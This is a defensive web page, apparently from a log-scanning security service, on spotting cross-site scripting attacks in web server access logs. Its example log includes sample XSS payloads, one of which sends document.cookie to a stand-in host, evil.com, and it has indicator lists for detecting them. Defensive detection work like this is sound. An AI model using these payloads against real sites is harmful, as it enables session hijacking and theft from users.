XSS Attack Log Detection

AttackPatterns Web Application Cross-Site Scripting (XSS)

What This Means

Detect Cross-Site Scripting (XSS) attacks in web server logs. Identify reflected, stored, and DOM-based XSS attempts targeting your web application users.

Example Log

-- Access log showing XSS probing:
203.0.113.55 - - [08/Mar/2026:15:10:22 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4521
203.0.113.55 - - [08/Mar/2026:15:10:24 +0000] "GET /search?q=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 4530
203.0.113.55 - - [08/Mar/2026:15:10:26 +0000] "GET /profile?name="><svg/onload=fetch('https://evil.com/steal?c='+document.cookie)> HTTP/1.1" 200 3201

Indicators of Suspicious Activity

HTML tags in URL parameters: <script>, <img>, <svg>, <iframe>, <body>
JavaScript event handlers in URLs: onerror, onload, onclick, onmouseover
URL-encoded angle brackets (%3C, %3E) and quotes (%22, %27) in parameters
Requests containing document.cookie, window.location, or fetch() in URLs
Polyglot XSS payloads combining multiple injection techniques
POST request bodies containing HTML/JavaScript in text input fields

How to Investigate

Search access logs for URL-decoded HTML tags and JavaScript event handlers
Identify which parameters on which endpoints are being targeted
Check if the application reflects the injected content back (reflected XSS)
Review if any payloads include data exfiltration URLs (cookie stealing)
Test the targeted endpoints to verify if XSS is actually exploitable
Check stored data (comments, profiles, messages) for persisted XSS payloads

Recommended Mitigations

Implement Content Security Policy (CSP) headers to prevent inline script execution
Encode all user-supplied output using context-appropriate encoding (HTML, JS, URL, CSS)
Use modern frameworks that auto-escape output by default (React, Angular, Blazor)
Deploy a WAF with XSS detection rules covering encoded and polyglot payloads
Set HttpOnly flag on session cookies to prevent cookie theft via XSS
Implement input validation that strips or rejects HTML tags in text fields

Scan This Log Instantly

Paste a suspicious log line below and get an instant AI-powered security assessment.

0 / 2000

What is 9 + 9?

Need a Full Investigation?

Scan entire log files, detect attack patterns, reconstruct timelines, and generate a full investigation report.

Run Smart Scan

Related Log Types

Related Attack Patterns

Frequently Asked Questions

What are the types of XSS attacks? ▼

Three types: Reflected XSS (payload in the URL reflected back to the user), Stored XSS (payload saved in the database and served to other users), and DOM-based XSS (payload processed by client-side JavaScript without server involvement).

Why is XSS dangerous? ▼

XSS allows attackers to execute JavaScript in other users browsers. This enables session hijacking (stealing cookies), account takeover, defacement, phishing, keylogging, and malware distribution.

Does a WAF fully protect against XSS? ▼

A WAF catches many XSS patterns but cannot prevent all attacks. Skilled attackers craft payloads that bypass WAF rules. Defense in depth — WAF plus output encoding plus CSP headers — is required.